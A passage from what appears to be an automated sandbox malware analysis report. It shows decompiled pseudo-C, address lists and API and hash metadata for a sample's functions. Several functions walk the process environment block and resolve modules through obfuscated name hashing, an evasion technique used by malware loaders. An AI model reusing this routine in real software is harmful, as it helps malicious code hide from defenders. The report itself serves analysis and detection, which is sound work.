												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												if(_t168 != 0) {
													goto L100;
												}
												goto L30;
											case 0x22:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L62:
												_push(__eax);
												goto L91;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L90:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
										}
									}
								}
								L96:
								_t181 =  *((intOrPtr*)(_t180 + 0x14));
								goto L97;
							}
						} else {
							L93:
							 *(_t205 - 0x10) = 1;
							L100:
							_t152 =  *(_t205 + 0x14);
							if(_t152 != 0) {
								 *_t152 =  *(_t205 - 0x10);
							}
							_push(1);
							_pop(0);
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t205 - 0xc));
							return 0;
						}
					}
					_t167 =  *(_t205 + 0x10);
					if( *_t167 == 0) {
						goto L30;
					}
					_push(_t205 - 0x10);
					_push(_t167);
					_push( *((intOrPtr*)(_t205 + 0xc)));
					_t168 =  *((intOrPtr*)( *__ecx + 0x7c))();
					goto L6;
				}
				_push( *(_t205 + 0x10));
				_push( *((intOrPtr*)(_t205 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0x78))() == 0) {
					goto L30;
				}
				goto L93;
			}

0x004145ca
0x004145cf
0x004145d7
0x004145dc
0x004145e7
0x004145e9
0x00414606
0x00414630
0x00414636
0x00414643
0x00414643
0x0041464b
0x00414669
0x0041466f
0x00414681
0x00414686
0x00414689
0x00414693
0x0041469a
0x0041469d
0x004146cd
0x004146cf
0x004146d2
0x00414748
0x00414748
0x0041474e
0x00000000
0x0041474e
0x00000000
0x004146dc
0x004146e3
0x00414704
0x0041470b
0x0041470e
0x0041473c
0x0041473f
0x00414743
0x00414746
0x004146d6
0x004146d9
0x00000000
0x004146d9
0x00000000
0x00414746
0x00414715
0x00414730
0x00414737
0x0041473a
0x00414712
0x00000000
0x00414712
0x00000000
0x0041473a
0x00414a4b
0x00414a4e
0x00414a53
0x00000000
0x00414a53
0x004146ed
0x004146f4
0x004146f7
0x00414768
0x0041476b
0x00414770
0x00000000
0x00414770
0x00000000
0x004146f9
0x004146a4
0x004146a4
0x004146a9
0x004146ac
0x004146b3
0x00414753
0x00000000
0x00414753
0x004146c0
0x00414773
0x00414773
0x00414776
0x0041477d
0x00414780
0x00414782
0x0041478d
0x00414791
0x00414791
0x00414794
0x00414798
0x00000000
0x0041479e
0x0041479e
0x00000000
0x004147a5
0x004147ad
0x00000000
0x00000000
0x004147b3
0x00000000
0x00000000
0x004147c0
0x004147c1
0x004147c4
0x004147c8
0x00000000
0x00000000
0x004147e0
0x004147e8
0x004147eb
0x004147ef
0x004147f2
0x004147f5
0x004147fa
0x004147fc
0x004147ff
0x00414800
0x00414804
0x00414807
0x0041480e
0x00414810
0x00414815
0x0041481a
0x0041481d
0x00414824
0x00414826
0x00414826
0x00414824
0x00414829
0x00414829
0x0041482c
0x0041482d
0x0041482e
0x00414831
0x00414833
0x00414834
0x00414836
0x0041483a
0x0041483e
0x00414842
0x00414845
0x00414848
0x0041484d
0x00414851
0x00000000
0x00000000
0x00414856
0x0041485e
0x00414861
0x00414864
0x00414867
0x0041486a
0x0041486b
0x0041486d
0x00414874
0x00414876
0x0041487a
0x0041487e
0x00414881
0x00414884
0x00414884
0x00000000
0x00000000
0x00414891
0x00414894
0x00414896
0x00000000
0x00000000
0x004148a0
0x004148a3
0x004148a4
0x00000000
0x00000000
0x004148ad
0x004148ae
0x004148b0
0x00000000
0x00000000
0x00414a59
0x00414a59
0x00414a5a
0x00000000
0x00000000
0x004148b7
0x004148bd
0x004148be
0x004148c1
0x004148c4
0x004148c4
0x004148c5
0x004148c9
0x004148c9
0x004148ca
0x004148cc
0x00000000
0x00000000
0x004148d3
0x004148d5
0x00000000
0x00000000
0x004148dc
0x00000000
0x00000000
0x004149cc
0x00000000
0x00000000
0x004148e6
0x004148e9
0x004148ec
0x004148ed
0x00000000
0x00000000
0x004148fb
0x004148fc
0x00000000
0x00000000
0x0041490c
0x00414913
0x00414914
0x00414919
0x00000000
0x00000000
0x00414922
0x00414925
0x00000000
0x00000000
0x00414930
0x00414933
0x00000000
0x00000000
0x0041493f
0x00414940
0x00414943
0x00414944
0x00414947
0x00000000
0x00000000
0x0041494e
0x00000000
0x00000000
0x00414960
0x00414961
0x00000000
0x00000000
0x00414966
0x00414969
0x0041496c
0x0041496f
0x00414970
0x00414970
0x00414974
0x00000000
0x00000000
0x0041497b
0x0041497f
0x004148f0
0x004148f0
0x00000000
0x00000000
0x0041498f
0x004149cd
0x004149cd
0x00000000
0x00000000
0x00414995
0x00414998
0x0041499a
0x00000000
0x00000000
0x004149a1
0x004149a4
0x004149a7
0x004149ae
0x004149b1
0x004149b4
0x004149b7
0x004149c8
0x004149c9
0x004149d0
0x004149d0
0x004149d2
0x00000000
0x004149d2
0x004149bf
0x004149c0
0x004149c3
0x00000000
0x00000000
0x004149ec
0x00000000
0x00000000
0x00414a18
0x00414a19
0x00414a1b
0x00414a1e
0x00000000
0x00000000
0x004149d9
0x004149dc
0x004149df
0x004149e2
0x00000000
0x00000000
0x004149e6
0x004149e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00414953
0x00414954
0x00414954
0x0041492a
0x0041492a
0x004149ed
0x004149ed
0x004149ef
0x00000000
0x00000000
0x004147d2
0x004147d6
0x004149e3
0x004149e3
0x00414a5d
0x00414a5f
0x00414a61
0x00414a61
0x00000000
0x00000000
0x00414a29
0x00414a2f
0x00414a30
0x00414a31
0x00414a34
0x00414a36
0x00414a39
0x00414a3a
0x00414a3e
0x00414a3f
0x00414a41
0x00414623
0x00414625
0x00000000
0x00000000
0x00000000
0x00000000
0x004149f3
0x004149f6
0x004149f7
0x004149fa
0x004149fa
0x004149fb
0x0041491c
0x0041491c
0x00000000
0x00000000
0x00414a04
0x00414a07
0x00414a0a
0x00414a0d
0x00414a0e
0x00414a0e
0x00414a0f
0x00414a12
0x00414a12
0x00414a14
0x00000000
0x00000000
0x0041479e
0x00414798
0x00414a56
0x00414a56
0x00000000
0x00414a56
0x00414a20
0x00414a20
0x00414a20
0x00414a64
0x00414a64
0x00414a69
0x00414a6e
0x00414a6e
0x00414a70
0x00414a72
0x00414755
0x0041475b
0x00414763
0x00414763
0x0041464b
0x00414608
0x0041460e
0x00000000
0x00000000
0x00414619
0x0041461a
0x0041461b
0x00414620
0x00000000
0x00414620
0x004145eb
0x004145f0
0x004145f8
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004145CF
GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00414782

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologVersion
String ID:
API String ID: 1836448879-0
Opcode ID: 6804e743f549afb56d718e3d7c3f63743442d0cf40abdee9c0b7a5798ec63ac2
Instruction ID: 6d1c88816f6b00128a0c6823e596581e0366b3c43c7f26b1fcf2de6b97230d22
Opcode Fuzzy Hash: 6804e743f549afb56d718e3d7c3f63743442d0cf40abdee9c0b7a5798ec63ac2
Instruction Fuzzy Hash: 1EE19FB0600215ABDB10DF65CC80AFF77A9AF84715F10811AF8199B291D73CEE82DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004182CC, Relevance: 3.1, APIs: 2, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004182CC(CHAR* _a4, intOrPtr* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* __ebp;
				signed char _t21;
				void* _t23;
				intOrPtr _t36;
				void* _t37;
				signed int _t43;
				intOrPtr* _t45;

				_t45 = _a8;
				_push(_a4);
				_t43 = _t45 + 0x12;
				_push(_t43);
				_t21 = E00417B29();
				if(_t21 != 0) {
					_t23 = FindFirstFileA(_a4,  &_v324);
					_t44 = _t43 | 0xffffffff;
					if(_t23 != (_t43 | 0xffffffff)) {
						FindClose(_t23);
						 *(_t45 + 0x10) = _v324.dwFileAttributes & 0x0000007f;
						 *((intOrPtr*)(_t45 + 0xc)) = _v324.nFileSizeLow;
						 *_t45 =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftCreationTime), _t44)));
						 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftLastAccessTime), _t44)));
						_t36 =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftLastWriteTime), _t44)));
						 *((intOrPtr*)(_t45 + 4)) = _t36;
						if( *_t45 == 0) {
							 *_t45 = _t36;
						}
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 4));
						}
						_t37 = 1;
						return _t37;
					}
					L3:
					return 0;
				}
				 *_t43 =  *_t43 & _t21;
				goto L3;
			}

0x004182d6
0x004182da
0x004182dd
0x004182e0
0x004182e1
0x004182e8
0x004182f8
0x004182fe
0x00418303
0x0041830a
0x0041831c
0x00418325
0x00418337
0x0041834b
0x0041835d
0x0041835f
0x00418365
0x00418367
0x00418367
0x0041836d
0x00418372
0x00418372
0x00418377
0x00000000
0x00418377
0x00418305
0x00000000
0x00418305
0x004182ea
0x00000000

APIs

Part of subcall function 00417B29: __EH_prolog.LIBCMT ref: 00417B2E
Part of subcall function 00417B29: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
Part of subcall function 00417B29: lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B

FindFirstFileA.KERNEL32(?,?,?,?), ref: 004182F8
FindClose.KERNEL32(00000000), ref: 0041830A

Part of subcall function 00410A21: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00410A31
Part of subcall function 00410A21: FileTimeToSystemTime.KERNEL32(?,?), ref: 00410A43

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
String ID:
API String ID: 1806329094-0
Opcode ID: b7f339ff05c08edb12b5b07986eaf3c3076bcc97df6ff015d563050ec9bdd282
Instruction ID: 6e730e5e3aabd3498d018952e94f1575065a8e7aa0a625f1e4e67d3b2b6d1fdd
Opcode Fuzzy Hash: b7f339ff05c08edb12b5b07986eaf3c3076bcc97df6ff015d563050ec9bdd282
Instruction Fuzzy Hash: FB219F32500209AFCB21DF61C840ADAB7F8EF29310F10496EE996D7250E774AAC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004238DC, Relevance: 3.0, APIs: 2, Instructions: 40
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004238DC(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t14;
				signed char _t17;
				void* _t22;

				_t22 = __ecx;
				_t17 = E00416528(__ecx);
				if((_t17 & 0x80000000) == 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t17 & 0x00000001) == 0)) {
					L6:
					return E004213D8(_t22, _a4, _a8);
				}
				_t14 = E0041538C(_t17, _t22, _a4, _a8);
				if(_t14 == 0) {
					goto L6;
				}
				return _t14;
			}

0x004238e2
0x004238e9
0x004238f1
0x00423930
0x00000000
0x00423938
0x00423927
0x0042392e
0x00000000
0x00000000
0x00423941

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetKeyState.USER32(00000073), ref: 0042390A
GetKeyState.USER32(00000012), ref: 00423913

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$LongWindow
String ID:
API String ID: 3716621309-0
Opcode ID: bb65e0fa9b7d0a7c0d825d9f292ebe4aecda4ee8138cf08f0cea5d2dfc1c7898
Instruction ID: 3c56875740f518b2a97b9670c9fd2796869f586b3b5a21460ff62eda90a64155
Opcode Fuzzy Hash: bb65e0fa9b7d0a7c0d825d9f292ebe4aecda4ee8138cf08f0cea5d2dfc1c7898
Instruction Fuzzy Hash: 1CF0FCB134022D76DF202956EC00BEA6B65CF517D5F80403BFD045B361CABDDE919258

Uniqueness

Uniqueness Score: -1.00%

Function 0042252B, Relevance: 3.0, APIs: 2, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042252B(void* __ecx, intOrPtr _a4) {
				void* _t4;
				void* _t13;
				intOrPtr _t14;

				_t14 = _a4;
				_t13 = __ecx;
				if(_t14 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x1c)) != 0) {
						if(IsIconic( *(_t13 + 0x1c)) != 0) {
							_push(9);
							goto L5;
						}
					} else {
						_push(1);
						L5:
						_pop(_t14);
					}
				}
				_t4 = E0042257B(_t13, _t14);
				if(_t14 != 0xffffffff) {
					E0041668C(_t13, _t14);
					return E0042257B(_t13, _t14);
				}
				return _t4;
			}

0x0042252c
0x00422534
0x00422536
0x00422543
0x00422554
0x00422556
0x00000000
0x00422556
0x00422545
0x00422545
0x00422558
0x00422558
0x00422558
0x00422543
0x0042255c
0x00422564
0x00422569
0x00000000
0x00422571
0x00422578

APIs

IsWindowVisible.USER32(?), ref: 0042253B
IsIconic.USER32 ref: 0042254C

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 3114faafbd09346105cd640fda3e95f07a6d839efd71b6390e56681c449daa18
Instruction ID: eccaba1ee9c055abd401265b19fa06f210334a3ac8d9ba70b154ff4e3b37beae
Opcode Fuzzy Hash: 3114faafbd09346105cd640fda3e95f07a6d839efd71b6390e56681c449daa18
Instruction Fuzzy Hash: A9F0A03174053236CA303E2D7D24ABF6A5A6B81364B95822BF520A22E0CBD88CD352DD

Uniqueness

Uniqueness Score: -1.00%

Function 021E3F20, Relevance: 2.6, Strings: 2, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E021E3F20(intOrPtr __ecx) {
				signed int _t93;
				signed int _t97;
				intOrPtr* _t100;
				signed short* _t103;
				signed int _t108;
				signed int _t113;
				intOrPtr* _t115;
				void* _t118;

				 *((intOrPtr*)(_t118 + 0xc)) = __ecx;
				_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				 *((intOrPtr*)(_t118 + 0x18)) = _t100;
				_t115 =  *_t100;
				if(_t115 == _t100) {
					L10:
					return 0;
				} else {
					do {
						_t103 =  *(_t115 + 0x30);
						 *(_t118 + 0x14) = 0x9c4e;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0x4464;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 1;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff87db;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff18d7;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff529c;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff507b;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) | 0x3b9f69dc;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xfffffdfe;
						 *(_t118 + 0x10) = 0x31f8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
						 *(_t118 + 0x10) = 0x4955;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
						if( *_t103 != 0) {
							do {
								_t97 =  *(_t118 + 0x14);
								 *(_t118 + 0x10) = 0x31f8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
								 *(_t118 + 0x10) = 0x4955;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
								_t113 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								_t93 =  *_t103 & 0x0000ffff;
								_t108 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								if(_t93 >= 0x41 && _t93 <= 0x5a) {
									_t93 = _t93 + 0x20;
								}
								 *(_t118 + 0x14) = _t93;
								_t103 =  &(_t103[1]);
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t113;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t108;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) - _t97;
							} while ( *_t103 != 0);
							_t100 =  *((intOrPtr*)(_t118 + 0x18));
						}
						if(( *(_t118 + 0x14) ^ 0x344765f2) ==  *((intOrPtr*)(_t118 + 0x1c))) {
							return  *((intOrPtr*)(_t115 + 0x18));
						} else {
							goto L9;
						}
						goto L12;
						L9:
						_t115 =  *_t115;
					} while (_t115 != _t100);
					goto L10;
				}
				L12:
			}

0x021e3f29
0x021e3f32
0x021e3f37
0x021e3f3b
0x021e3f3f
0x021e40cb
0x021e40d4
0x021e3f45
0x021e3f45
0x021e3f45
0x021e3f48
0x021e3f50
0x021e3f58
0x021e3f5c
0x021e3f64
0x021e3f6c
0x021e3f74
0x021e3f7c
0x021e3f84
0x021e3f8c
0x021e3f99
0x021e3f9d
0x021e3fa5
0x021e3fad
0x021e3fb5
0x021e3fbd
0x021e3fc2
0x021e3fca
0x021e3fd2
0x021e3fda
0x021e3fe2
0x021e3fea
0x021e3ff6
0x021e4000
0x021e4000
0x021e4004
0x021e4011
0x021e4015
0x021e401d
0x021e402e
0x021e4036
0x021e403e
0x021e4043
0x021e404b
0x021e4053
0x021e405b
0x021e4063
0x021e406b
0x021e4073
0x021e407e
0x021e4081
0x021e4086
0x021e408d
0x021e408d
0x021e4090
0x021e4094
0x021e4097
0x021e409b
0x021e409f
0x021e40a3
0x021e40ad
0x021e40ad
0x021e40be
0x021e40df
0x00000000
0x00000000
0x00000000
0x00000000
0x021e40c0
0x021e40c0
0x021e40c3
0x00000000
0x021e3f45
0x00000000

Strings

dD, xrefs: 021E3F50
UI, xrefs: 021E402E

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction ID: 54f591c96b56bb6f6845420a3e2497fb262746c3856d34657777a52146fff3ab
Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction Fuzzy Hash: 474113B65087828BD784CF24E94655FBBF0FB90724F440E1DE4A2962A0D3B4DA4DCB93

Uniqueness

Uniqueness Score: -1.00%

Function 006058AE, Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

UI, xrefs: 0060598C
dD, xrefs: 006058BB

Memory Dump Source

Source File: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction ID: 289f7e693dcc86f832b3ea248fdeabf9b6326762339a06789ace6a1163fe09dd
Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction Fuzzy Hash: 2831C1B2508742AFD3849E2AC54611FFBF4BB90724F45CD1DE0E9862A0D3B88985CF43

Uniqueness

Uniqueness Score: -1.00%

Function 021E3D10, Relevance: 2.6, Strings: 2, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E021E3D10(signed short* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _t58;
				signed int _t60;
				signed short* _t65;
				signed int _t68;
				signed int _t72;

				_v4 = 0x9c4e;
				_t65 = __ecx;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *((short*)(__ecx)) != 0) {
					do {
						_t60 = _v4;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_t72 = _v4 << (_v8 & 0x000000ff);
						_t58 =  *_t65 & 0x0000ffff;
						_t68 = _v4 << (_v8 & 0x000000ff);
						if(_t58 >= 0x41 && _t58 <= 0x5a) {
							_t58 = _t58 + 0x20;
						}
						_v4 = _t58;
						_t65 =  &(_t65[1]);
						_v4 = _v4 + _t72;
						_v4 = _v4 + _t68;
						_v4 = _v4 - _t60;
					} while ( *_t65 != 0);
				}
				return _v4;
			}

0x021e3d13
0x021e3d1b
0x021e3d1d
0x021e3d25
0x021e3d29
0x021e3d31
0x021e3d39
0x021e3d41
0x021e3d49
0x021e3d51
0x021e3d59
0x021e3d64
0x021e3d67
0x021e3d6e
0x021e3d75
0x021e3d7c
0x021e3d83
0x021e3d87
0x021e3d8e
0x021e3d95
0x021e3d9c
0x021e3da3
0x021e3daa
0x021e3db5
0x021e3dc0
0x021e3dc0
0x021e3dc4
0x021e3dd1
0x021e3dd5
0x021e3ddd
0x021e3dee
0x021e3df6
0x021e3dfe
0x021e3e03
0x021e3e0b
0x021e3e13
0x021e3e1b
0x021e3e23
0x021e3e2b
0x021e3e33
0x021e3e3e
0x021e3e41
0x021e3e46
0x021e3e4d
0x021e3e4d
0x021e3e50
0x021e3e54
0x021e3e57
0x021e3e5b
0x021e3e5f
0x021e3e63
0x021e3e6f
0x021e3e77

Strings

UI, xrefs: 021E3DEE
dD, xrefs: 021E3D1D

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction ID: 56103bdf218710ab9296e0457632408ea551f851f9801c1d3db876cdb5aaafdd
Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction Fuzzy Hash: B531D3B2508742AFD3849E2AC54612FFBF0BB90724F45CD5DE0E9861A0D3B88985CF43

Uniqueness

Uniqueness Score: -1.00%

Function 021E3BA0, Relevance: 2.6, Strings: 2, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E021E3BA0(char* __ecx) {
				signed int _v4;
				signed int _v8;
				char* _t83;

				_v4 = 0x9c4e;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_t83 = __ecx;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *__ecx != 0) {
					do {
						_t83 = _t83 + 1;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
